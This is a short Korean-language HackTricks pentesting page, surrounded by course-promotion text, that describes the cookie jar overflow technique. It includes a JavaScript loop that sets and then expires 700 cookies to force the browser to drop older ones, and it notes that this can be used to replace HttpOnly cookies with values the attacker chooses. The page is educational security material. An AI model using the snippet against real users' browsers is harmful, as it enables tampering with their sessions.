hacktricks/pentesting-web/hacking-with-cookies/cookie-jar-overflow.md
2024-02-10 21:30:13 +00:00

3.1 KiB

htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!

HackTricks를 지원하는 다른 방법:

브라우저는 페이지에 저장할 수 있는 쿠키의 제한이 있습니다. 그러므로 어떤 이유로 인해 쿠키를 사라지게 하려면 가장 오래된 쿠키가 삭제되도록 쿠키 저장소를 오버플로우할 수 있습니다.

// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`;
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`;
}

제 3자 쿠키는 다른 도메인을 가리키기 때문에 덮어쓰이지 않습니다.

{% hint style="danger" %} 이 공격은 HttpOnly 쿠키를 덮어쓸 수 있으므로 삭제한 다음 원하는 값으로 재설정할 수 있습니다.

이 랩을 포함한 이 게시물에서 확인하세요. {% endhint %}

htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!

HackTricks를 지원하는 다른 방법: